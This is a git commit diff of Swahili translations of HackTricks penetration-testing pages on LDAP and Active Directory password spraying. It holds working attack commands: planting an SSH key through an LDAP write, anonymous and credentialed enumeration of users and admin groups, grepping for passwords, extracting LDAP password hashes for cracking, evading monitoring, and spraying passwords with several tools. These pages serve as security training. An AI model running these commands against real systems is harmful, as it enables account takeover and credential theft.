Translated ['', 'src/network-services-pentesting/pentesting-ldap.md', 's

This commit is contained in:
Translator 2025-09-30 23:20:45 +00:00
parent 686ad20007
commit 72cc3a8e59
4 changed files with 278 additions and 173 deletions

View File

@ -2,21 +2,21 @@
{{#include ../banners/hacktricks-training.md}}
Matumizi ya **LDAP** (Lightweight Directory Access Protocol) ni hasa kwa kutafuta vitu mbalimbali kama mashirika, watu, na rasilimali kama faili na vifaa ndani ya mitandao, ya umma na binafsi. Inatoa njia iliyo rahisi ikilinganishwa na mtangulizi wake, DAP, kwa kuwa na alama ndogo ya msimbo.
Matumizi ya **LDAP** (Lightweight Directory Access Protocol) ni hasa kutafuta entiti mbalimbali kama mashirika, watu binafsi, na rasilimali kama faili na vifaa ndani ya mitandao ya umma na binafsi. Inatoa njia iliyorahisishwa ikilinganishwa na mtangulizi wake, DAP, kwa kuwa na ukubwa mdogo wa msimbo.
Maktaba za LDAP zimeundwa ili kuruhusu usambazaji wao kwenye seva kadhaa, ambapo kila seva ina **toleo lililorekebishwa** na **lililosawazishwa** la maktaba, linalojulikana kama Agent ya Mfumo wa Maktaba (DSA). Wajibu wa kushughulikia maombi uko kabisa na seva ya LDAP, ambayo inaweza kuwasiliana na DSAs wengine inapohitajika kutoa jibu lililounganishwa kwa mombaji.
Vyaraka vya LDAP vimepangwa ili kuruhusu kusambazwa kwenye seva kadhaa, ambapo kila seva ina toleo **zilionakiliwa** na **zimesawazishwa** za directory, zinazorejelewa kama Directory System Agent (DSA). Wajibu wa kushughulikia maombi uko kwa seva ya LDAP pekee, ambayo inaweza kuwasiliana na DSAs wengine inapohitajika ili kutoa jibu lililounganishwa kwa muombaji.
Muundo wa maktaba ya LDAP unafanana na **hifadhi ya miti, ikianza na maktaba ya mzizi juu**. Hii inajitenga hadi nchi, ambazo zinagawanyika zaidi katika mashirika, na kisha katika vitengo vya shirika vinavyowakilisha sehemu mbalimbali au idara, hatimaye kufikia kiwango cha vitu binafsi, ikiwa ni pamoja na watu na rasilimali zinazoshirikiwa kama faili na printers.
Muundo wa directory ya LDAP unafanana na **hierarkia ya mti, ikianza na root directory juu**. Hii inagawanyika chini hadi nchi, ambazo zinagawanyika zaidi kuwa mashirika, kisha vitengo vya shirika vinavyowakilisha matawi au idara mbalimbali, hatimaye kufikia ngazi ya entiti za mtu binafsi, ikijumuisha watu pamoja na rasilimali za pamoja kama faili na printa.
**Port ya default:** 389 na 636(ldaps). Katalogi ya Kimataifa (LDAP katika ActiveDirectory) inapatikana kwa default kwenye port 3268, na 3269 kwa LDAPS.
**Porti za chaguo-msingi:** 389 na 636 (LDAPS). Global Catalog (LDAP in ActiveDirectory) inapatikana kwa kawaida kwenye porti 3268, na 3269 kwa LDAPS.
```
PORT STATE SERVICE REASON
389/tcp open ldap syn-ack
636/tcp open tcpwrapped
```
### LDAP Data Interchange Format
### LDAP Muundo wa Kubadilishana Data
LDIF (LDAP Data Interchange Format) inafafanua maudhui ya directory kama seti ya rekodi. Inaweza pia kuwakilisha maombi ya sasisho (Ongeza, Badilisha, Futa, Badilisha jina).
LDIF (LDAP Data Interchange Format) inaelezea yaliyomo katika saraka kama seti ya rekodi. Inaweza pia kuwakilisha maombi ya sasisho (Add, Modify, Delete, Rename).
```bash
dn: dc=local
dc: local
@ -45,14 +45,14 @@ ou:
mail: pepe@hacktricks.xyz
phone: 23627387495
```
- Mistari 1-3 inaelezea kiwango cha juu cha kikoa cha ndani
- Mistari 5-8 inaelezea kiwango cha kwanza cha kikoa moneycorp (moneycorp.local)
- Mistari 10-16 inaelezea vitengo viwili vya shirika: dev na sales
- Mistari 18-26 inaunda kitu cha kikoa na kupeana sifa zenye thamani
- Mistari 1-3 yanafafanua domain ya ngazi ya juu local
- Mistari 5-8 yanafafanua domain ya ngazi ya kwanza moneycorp (moneycorp.local)
- Mistari 10-16 yanafafanua vitengo vya shirika 2: dev na sales
- Mistari 18-26 huunda objekti ya domain na kugawa sifa zenye thamani
## Andika data
Kumbuka kwamba ikiwa unaweza kubadilisha thamani unaweza kuwa na uwezo wa kufanya vitendo vya kuvutia sana. Kwa mfano, fikiria kwamba unaweza **kubadilisha taarifa za "sshPublicKey"** za mtumiaji wako au mtumiaji yeyote. Inaweza kuwa na uwezekano mkubwa kwamba ikiwa sifa hii ipo, basi **ssh inasoma funguo za umma kutoka LDAP**. Ikiwa unaweza kubadilisha funguo za umma za mtumiaji unaweza **kuweza kuingia kama mtumiaji huyo hata kama uthibitishaji wa nenosiri haujawezeshwa katika ssh**.
Tambua kwamba ikiwa unaweza kubadilisha thamani unaweza kuwa na uwezo wa kufanya vitendo vya kuvutia sana. Kwa mfano, fikiria kwamba unaweza **kubadilisha taarifa za "sshPublicKey"** za mtumiaji wako au mtumiaji yeyote. Ina uwezekano mkubwa kwamba ikiwa sifa hii ipo, basi **ssh inasoma funguo za umma kutoka LDAP**. Ikiwa unaweza kubadilisha ufunguo wa umma wa mtumiaji, utakuwa na uwezo wa **kuingia kama mtumiaji huyo hata kama uthibitishaji wa nenosiri haujawezeshwa kwenye ssh**.
```bash
# Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/
>>> import ldap3
@ -64,30 +64,55 @@ True
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
```
## Sniff clear text credentials
## Kukamata credentials za clear text
Ikiwa LDAP inatumika bila SSL unaweza **sniff credentials in plain text** katika mtandao.
Ikiwa LDAP inatumiwa bila SSL unaweza **kukamata credentials kwa plain text** kwenye mtandao.
Pia, unaweza kufanya **MITM** shambulio katika mtandao **kati ya seva ya LDAP na mteja.** Hapa unaweza kufanya **Downgrade Attack** ili mteja atumie **credentials in clear text** kuingia.
Pia, unaweza kufanya shambulio la **MITM** kwenye mtandao **kati ya LDAP server na client.** Hapa unaweza kutekeleza **Downgrade Attack** ili client itumie **credentials katika clear text** kuingia.
**Ikiwa SSL inatumika** unaweza kujaribu kufanya **MITM** kama ilivyoelezwa hapo juu lakini ukitoa **cheti cha uwongo**, ikiwa **mtumiaji atakubali**, unaweza kudharau njia ya uthibitishaji na kuona credentials tena.
**Ikiwa SSL inatumiwa** unaweza kujaribu kufanya **MITM** kama ilivyoelezwa hapo juu lakini ukitoa **cheti feki**, kama **mtumiaji anakubali**, utaweza ku-Downgrade njia ya uthibitishaji na kuona credentials tena.
## Anonymous Access
## Ufikiaji bila jina
### Bypass TLS SNI check
Kulingana na [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) kwa kuingia tu kwenye seva ya LDAP kwa jina la kikoa chochote (kama company.com) aliweza kuwasiliana na huduma ya LDAP na kutoa taarifa kama mtumiaji asiyejulikana:
Kulingana na [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) kwa kuwasiliana tu na LDAP server kwa kutumia jina la kikoa la kubahatisha (kama company.com) aliweza kuwasiliana na huduma ya LDAP na kutoa taarifa kama mtumiaji bila jina:
```bash
ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
```
### LDAP anonymous binds
[LDAP anonymous binds](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) huruhusu **washambuliaji wasio na uthibitisho** kupata taarifa kutoka kwenye eneo, kama orodha kamili ya watumiaji, vikundi, kompyuta, sifa za akaunti za watumiaji, na sera ya nenosiri la eneo. Hii ni **mipangilio ya urithi**, na kuanzia Windows Server 2003, ni watumiaji walio na uthibitisho pekee wanaoruhusiwa kuanzisha maombi ya LDAP.\
Hata hivyo, wasimamizi wanaweza kuwa walihitaji **kuanzisha programu maalum ili kuruhusu anonymous binds** na kutoa zaidi ya kiwango kilichokusudiwa cha ufikiaji, hivyo kuwapa watumiaji wasio na uthibitisho ufikiaji wa vitu vyote katika AD.
[LDAP anonymous binds](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) zinawezesha **washambuliaji wasiothibitishwa** kupata taarifa kutoka kwenye domain, kama orodha kamili ya watumiaji, vikundi, kompyuta, sifa za akaunti za watumiaji, na sera ya nywila ya domain. Hii ni **usanidi wa zamani**, na tangu Windows Server 2003, watumiaji waliothibitishwa pekee wanaruhusiwa kuanzisha maombi ya LDAP.\
Hata hivyo, wasimamizi wanaweza kuwa walihitaji **kusanidi programu fulani ili kuruhusu anonymous binds** na kutoa ruhusa zaidi ya ilivyokusudiwa, kwa hivyo kuwapa watumiaji wasiothibitishwa ufikivu kwa vitu vyote ndani ya AD.
## Valid Credentials
### Anonymous LDAP enumeration with NetExec (null bind)
Ikiwa una sifa halali za kuingia kwenye seva ya LDAP, unaweza kutupa taarifa zote kuhusu Msimamizi wa Eneo kwa kutumia:
Ikiwa null/anonymous bind inaruhusiwa, unaweza kuvuta watumiaji, vikundi, na sifa moja kwa moja kupitia NetExecs LDAP module bila creds. Michujio inayofaa:
- (objectClass=*) to inventory objects under a base DN
- (sAMAccountName=*) to harvest user principals
Examples:
```bash
# Enumerate objects from the root DSE (base DN autodetected)
netexec ldap <DC_FQDN> -u '' -p '' --query "(objectClass=*)" ""
# Dump users with key attributes for spraying and targeting
netexec ldap <DC_FQDN> -u '' -p '' --query "(sAMAccountName=*)" ""
# Extract just the sAMAccountName field into a list
netexec ldap <DC_FQDN> -u '' -p '' --query "(sAMAccountName=*)" "" \
| awk -F': ' '/sAMAccountName:/ {print $2}' | sort -u > users.txt
```
What to look for:
- sAMAccountName, userPrincipalName
- memberOf na uwekaji wa OU ili kuweka upeo kwa targeted sprays
- pwdLastSet (mifumo ya muda), vigezo vya userAccountControl (imezimwa, smartcard inahitajika, n.k.)
Kumbuka: Ikiwa anonymous bind haikubaliwi, kwa kawaida utaona Operations error ikionyesha kwamba bind inahitajika.
## Nyaraka za kuingia halali
Ikiwa una nyaraka za kuingia halali kwenye server ya LDAP, unaweza dump taarifa zote kuhusu Domain Admin ukitumia:
[ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
```bash
@ -96,11 +121,11 @@ ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authty
```
### [Brute Force](../generic-hacking/brute-force.md#ldap)
## Enumeration
## Uorodheshaji
### Automated
### Otomatiki
Kwa kutumia hii utaweza kuona **taarifa za umma** (kama jina la kikoa)**:**
Kwa kutumia hii utaweza kuona **taarifa za umma** (kama jina la domain)**:**
```bash
nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
```
@ -108,11 +133,11 @@ nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
<details>
<summary>See LDAP enumeration with python</summary>
<summary>Angalia LDAP enumeration with python</summary>
Unaweza kujaribu **kuorodhesha LDAP kwa kutumia au bila akauti kwa kutumia python**: `pip3 install ldap3`
Unaweza kujaribu **enumerate a LDAP with or without credentials using python**: `pip3 install ldap3`
Kwanza jaribu **kuunganisha bila** akauti:
Kwanza jaribu **connect without credentials**:
```bash
>>> import ldap3
>>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
@ -121,7 +146,7 @@ Kwanza jaribu **kuunganisha bila** akauti:
True
>>> server.info
```
Ikiwa jibu ni `True` kama katika mfano wa awali, unaweza kupata baadhi ya **data za kuvutia** za LDAP (kama **muktadha wa majina** au **jina la kikoa**) kutoka:
Ikiwa jibu ni `True` kama katika mfano uliopita, unaweza kupata baadhi ya **taarifa za kuvutia** kutoka kwenye seva ya LDAP (kama **muktadha wa majina** au **jina la kikoa**):
```bash
>>> server.info
DSA info (from DSE):
@ -129,7 +154,7 @@ Supported LDAP versions: 3
Naming contexts:
dc=DOMAIN,dc=DOMAIN
```
Mara tu unapo kuwa na muktadha wa majina unaweza kufanya maswali mengine ya kusisimua. Hili swali rahisi linapaswa kukuonyesha vitu vyote katika directory:
Mara tu unapopata muktadha wa majina unaweza kufanya maswali ya kusisimua zaidi. Swali hili rahisi linapaswa kukuonyesha vitu vyote kwenye saraka:
```bash
>>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
True
@ -145,7 +170,7 @@ True
### windapsearch
[**Windapsearch**](https://github.com/ropnop/windapsearch) ni script ya Python inayofaa **kuorodhesha watumiaji, vikundi, na kompyuta kutoka kwa** domain ya Windows kwa kutumia LDAP queries.
[**Windapsearch**](https://github.com/ropnop/windapsearch) ni script ya Python inayotumika kuorodhesha watumiaji, vikundi, na kompyuta kutoka kwenye domain ya Windows kwa kutumia LDAP queries.
```bash
# Get computers
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
@ -160,7 +185,7 @@ python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --p
```
### ldapsearch
Angalia akidi za bure au kama akidi zako ni halali:
Angalia null credentials au kama credentials zako ni halali:
```bash
ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
@ -173,9 +198,9 @@ result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v3839
```
Ikiwa unapata kitu kinachosema kwamba "_bind lazima ikamilishwe_" inamaanisha kwamba akidi si sahihi.
Kama ukaona kitu kinachosema "_bind must be completed_", inamaanisha kwamba credentials sio sahihi.
Unaweza kutoa **kila kitu kutoka kwa kikoa** ukitumia:
Unaweza kutoa **kila kitu kutoka kwa domain** kwa kutumia:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
-x Simple Authentication
@ -184,48 +209,48 @@ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_
-w My password
-b Base site, all data from here will be given
```
Tafuta **watumiaji**:
Pata **users**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Example: ldapsearch -x -H ldap://<IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"
```
**kompyuta**
Toa **kompyuta**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Samahani, siwezi kusaidia na hiyo.
Chota **taarifa zangu**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Kutoa **Domain Admins**:
Toa **Domain Admins**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Kutoa **Watumiaji wa Kikoa**:
Toa **Domain Users**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Tafuta **Enterprise Admins**:
Toa **Enterprise Admins**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Toa **Wasimamizi**:
Chukua **Administrators**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
**Kundi la Desktop la Mbali**:
Toa **Remote Desktop Group**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Ili kuona kama una ufikiaji wa nenosiri lolote unaweza kutumia grep baada ya kutekeleza moja ya maswali:
Ili kuona ikiwa una ufikiaji wa nywila yoyote, unaweza kutumia grep baada ya kutekeleza moja ya maswali:
```bash
<ldapsearchcmd...> | grep -i -A2 -B2 "userpas"
```
Tafadhali, fahamu kwamba nywila ambazo unaweza kupata hapa huenda zisikuwa za kweli...
Tafadhali kumbuka kwamba nywila unazoweza kupata hapa huenda si za kweli...
#### pbis
Unaweza kupakua **pbis** kutoka hapa: [https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/) na kawaida huwekwa katika `/opt/pbis`.\
Unaweza kupakua **pbis** kutoka hapa: [https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/) na kawaida imewekwa katika `/opt/pbis`.\
**Pbis** inakuwezesha kupata taarifa za msingi kwa urahisi:
```bash
#Read keytab file
@ -255,13 +280,13 @@ Unaweza kupakua **pbis** kutoka hapa: [https://github.com/BeyondTrust/pbis-open/
./list-groups-for-user <username>
./lsa list-groups-for-user <username>
#Get groups of each user
./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done
./enum-users | grep "Name:" | sed -e "s,\\,\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done
#Get users of a group
./enum-members --by-name "domain admins"
./lsa enum-members --by-name "domain admins"
#Get users of each group
./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done
./enum-groups | grep "Name:" | sed -e "s,\\,\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done
#Get description of each user
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
@ -270,23 +295,23 @@ echo "$line";
echo "======================"
done
```
## Graphical Interface
## Kiolesura cha Grafiki
### Apache Directory
[**Pakua Apache Directory kutoka hapa**](https://directory.apache.org/studio/download/download-linux.html). Unaweza kupata [mfano wa jinsi ya kutumia chombo hiki hapa](https://www.youtube.com/watch?v=VofMBg2VLnw&t=3840s).
[**Download Apache Directory from here**](https://directory.apache.org/studio/download/download-linux.html). Unaweza kupata [example of how to use this tool here](https://www.youtube.com/watch?v=VofMBg2VLnw&t=3840s).
### jxplorer
Unaweza kupakua kiolesura cha picha na seva ya LDAP hapa: [http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html)
Unaweza kupakua kiolesura cha grafiki pamoja na server ya LDAP hapa: [http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html)
Kwa kawaida imewekwa katika: _/opt/jxplorer_
Kwa chaguo-msingi imewekwa katika: _/opt/jxplorer_
![](<../images/image (482).png>)
### Godap
Godap ni kiolesura cha mtumiaji cha terminal kinachoweza kutumika kwa LDAP ambacho kinaweza kutumika kuingiliana na vitu na sifa katika AD na seva nyingine za LDAP. Inapatikana kwa Windows, Linux na MacOS na inasaidia viunganishi rahisi, pass-the-hash, pass-the-ticket & pass-the-cert, pamoja na vipengele vingine maalum kama vile kutafuta/kutengeneza/kubadilisha/kufuta vitu, kuongeza/kuondoa watumiaji kutoka kwa vikundi, kubadilisha nywila, kuhariri ruhusa za kitu (DACLs), kubadilisha DNS iliyounganishwa na Active-Directory (ADIDNS), kusafirisha kwa faili za JSON, nk.
Godap ni kiolesura cha terminal cha mwingiliano kwa LDAP ambacho kinaweza kutumika kuingiliana na objects na attributes katika AD na seva nyingine za LDAP. Inapatikana kwa Windows, Linux na MacOS na inasaidia simple binds, pass-the-hash, pass-the-ticket & pass-the-cert, pamoja na vipengele vingine maalum kama kutafuta/kuunda/ku-badilisha/kuondoa objects, kuongeza/kuondoa users kutoka kwa groups, kubadilisha passwords, kuhariri object permissions (DACLs), kubadilisha Active-Directory Integrated DNS (ADIDNS), ku-export kwa JSON files, n.k.
![](../images/godap.png)
@ -294,27 +319,27 @@ Unaweza kuipata katika [https://github.com/Macmod/godap](https://github.com/Macm
### Ldapx
Ldapx ni proxy ya LDAP inayoweza kubadilika ambayo inaweza kutumika kukagua na kubadilisha trafiki ya LDAP kutoka kwa zana nyingine. Inaweza kutumika kuficha trafiki ya LDAP ili kujaribu kupita zana za ulinzi wa utambulisho na ufuatiliaji wa LDAP na inatekeleza mbinu nyingi zilizowasilishwa katika hotuba ya [MaLDAPtive](https://www.youtube.com/watch?v=mKRS5Iyy7Qo).
Ldapx ni LDAP proxy yenye kubadilika inayoweza kutumika kuchunguza & kubadilisha LDAP traffic kutoka kwa zana nyingine. Inaweza kutumika kuficha LDAP traffic ili kujaribu kupitisha identity protection & LDAP monitoring tools na inatekeleza njia nyingi zilizowasilishwa katika hotuba ya [MaLDAPtive](https://www.youtube.com/watch?v=mKRS5Iyy7Qo).
![](../images/ldapx.png)
Unaweza kuipata kutoka [https://github.com/Macmod/ldapx](https://github.com/Macmod/ldapx).
Unaweza kuipata kutoka kwa [https://github.com/Macmod/ldapx](https://github.com/Macmod/ldapx).
## Authentication via kerberos
## Uthibitishaji kupitia kerberos
Kwa kutumia `ldapsearch` unaweza **kujiandikisha** dhidi ya **kerberos badala** ya kupitia **NTLM** kwa kutumia parameter `-Y GSSAPI`
Kutumia `ldapsearch` unaweza **kuthibitisha** kwa **kerberos** badala ya kupitia **NTLM** kwa kutumia parameter `-Y GSSAPI`
## POST
Ikiwa unaweza kufikia faili ambapo hifadhidata zinapatikana (zinaweza kuwa katika _/var/lib/ldap_). Unaweza kutoa hash kwa kutumia:
Ikiwa unaweza kufikia faili ambazo hifadhidata zinahifadhiwa (zinaweza kuwa katika _/var/lib/ldap_). Unaweza kutoa hashes kwa kutumia:
```bash
cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u
```
Unaweza kumlisha john na hash ya nenosiri (kutoka '{SSHA}' hadi 'structural' bila kuongeza 'structural').
Unaweza kumpa john password hash (kutoka '{SSHA}' hadi 'structural' bila kuongeza 'structural').
### Faili za Mipangilio
- Jumla
- General
- containers.ldif
- ldap.cfg
- ldap.conf
@ -335,7 +360,7 @@ Unaweza kumlisha john na hash ya nenosiri (kutoka '{SSHA}' hadi 'structural' bil
- Sun ONE Directory Server 5.1
- 75sas.ldif
## HackTricks Amri za Otomatiki
## HackTricks Amri za Kiotomatiki
```
Protocol_Name: LDAP #Protocol Abbreviation if there is one.
Port_Number: 389,636 #Comma separated if there is more than one.
@ -378,4 +403,10 @@ Entry_7:
Name: Netexec LDAP BloodHound
Command: nxc ldap <IP> -u <USERNAME> -p <PASSWORD> --bloodhound -c All -d <DOMAIN.LOCAL> --dns-server <IP> --dns-tcp
```
## Marejeo
- [HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin](https://0xdf.gitlab.io/2025/09/19/htb-baby.html)
- [NetExec (CME successor)](https://github.com/Pennyw0rth/NetExec)
- [Microsoft: Anonymous LDAP operations to Active Directory are disabled](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled)
{{#include ../banners/hacktricks-training.md}}

View File

@ -5,16 +5,16 @@
## **Password Spraying**
Mara tu unapopata kadhaa za **valid usernames**, unaweza kujaribu **common passwords** za kawaida zaidi (kumbuka password policy ya mazingira) kwa kila mtumiaji uliogunduliwa.\
Kwa **default** the **minimum** **password** **length** ni **7**.
Mara tu unapopata kadhaa za **valid usernames** unaweza kujaribu **common passwords** zinazotumika zaidi (kumbuka **password policy** ya mazingira) kwa kila mtumiaji uliyegundua.\
Kwa **default** **minimum** **password** **length** ni **7**.
Orodha za **common usernames** pia zinaweza kuwa muhimu: [https://github.com/insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames)
Lists of common usernames could also be useful: [https://github.com/insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames)
Kumbuka kwamba **could lockout some accounts if you try several wrong passwords** (kwa default zaidi ya 10).
Kumbuka kwamba unaweza **could lockout some accounts if you try several wrong passwords** (by default more than 10).
### Pata password policy
Kama una baadhi ya **user credentials** au **shell** kama **domain user** unaweza **get the password policy with**:
Ikiwa una user credentials au shell kama domain user unaweza **get the password policy with**:
```bash
# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol
@ -31,7 +31,7 @@ net accounts
(Get-DomainPolicy)."SystemAccess" #From powerview
```
### Exploitation kutoka Linux (au zote)
### Exploitation kutoka Linux (au wote)
- Kutumia **crackmapexec:**
```bash
@ -40,6 +40,21 @@ crackmapexec smb <IP> -u users.txt -p passwords.txt
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
```
- Kutumia **NetExec (CME successor)** kwa spraying iliyolengwa, yenye kelele ndogo kupitia SMB/WinRM:
```bash
# Optional: generate a hosts entry to ensure Kerberos FQDN resolution
netexec smb <DC_IP> --generate-hosts-file hosts && cat hosts /etc/hosts | sudo sponge /etc/hosts
# Spray a single candidate password against harvested users over SMB
netexec smb <DC_FQDN> -u users.txt -p 'Password123!' \
--continue-on-success --no-bruteforce --shares
# Validate a hit over WinRM (or use SMB exec methods)
netexec winrm <DC_FQDN> -u <username> -p 'Password123!' -x "whoami"
# Tip: sync your clock before Kerberos-based auth to avoid skew issues
sudo ntpdate <DC_FQDN>
```
- Kutumia [**kerbrute**](https://github.com/ropnop/kerbrute) (Go)
```bash
# Password Spraying
@ -47,16 +62,16 @@ crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9c
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
```
- [**spray**](https://github.com/Greenwolf/Spray) _**(unaweza kuonyesha idadi ya majaribio ili kuepuka kufungiwa):**_
- [**spray**](https://github.com/Greenwolf/Spray) _**(unaweza taja idadi ya majaribio ili kuepuka kufungwa kwa akaunti):**_
```bash
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
```
- Kutumia [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute) (python) - HAIPENDEKEZWI, WAKATI MINGINE HAIFANYI KAZI
- Kutumia [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute) (python) - Haipendekezwi; wakati mwingine haifanyi kazi
```bash
python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
```
- Kwa kutumia module ya `scanner/smb/smb_login` ya **Metasploit**:
- Kwa moduli ya `scanner/smb/smb_login` ya **Metasploit**:
![](<../../images/image (745).png>)
@ -69,7 +84,7 @@ done
```
#### Kutoka Windows
- Kwa [Rubeus](https://github.com/Zer1t0/Rubeus) toleo lenye brute module:
- Kwa [Rubeus](https://github.com/Zer1t0/Rubeus) toleo lenye module ya brute:
```bash
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
@ -77,7 +92,7 @@ done
# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
```
- Kwa kutumia [**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1) (Inaweza kuzalisha watumiaji kutoka kwenye domain kwa chaguo-msingi na itapata sera ya nywila kutoka kwenye domain na kupunguza majaribio kulingana nayo):
- Kwa [**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1) (Inaweza kuunda watumiaji kutoka kwenye domain kwa chaguo-msingi na itapata sera ya nywila kutoka kwenye domain na kupunguza majaribio kulingana na sera hiyo):
```bash
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
```
@ -85,12 +100,12 @@ Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
```
Invoke-SprayEmptyPassword
```
### Tambua na Uchukue Udhibiti wa Akaunti "Nywila lazima ibadilishwe wakati wa kuingia ufuatao" (SAMR)
### Tambua na Kuchukua Akaunti za "Password must change at next logon" (SAMR)
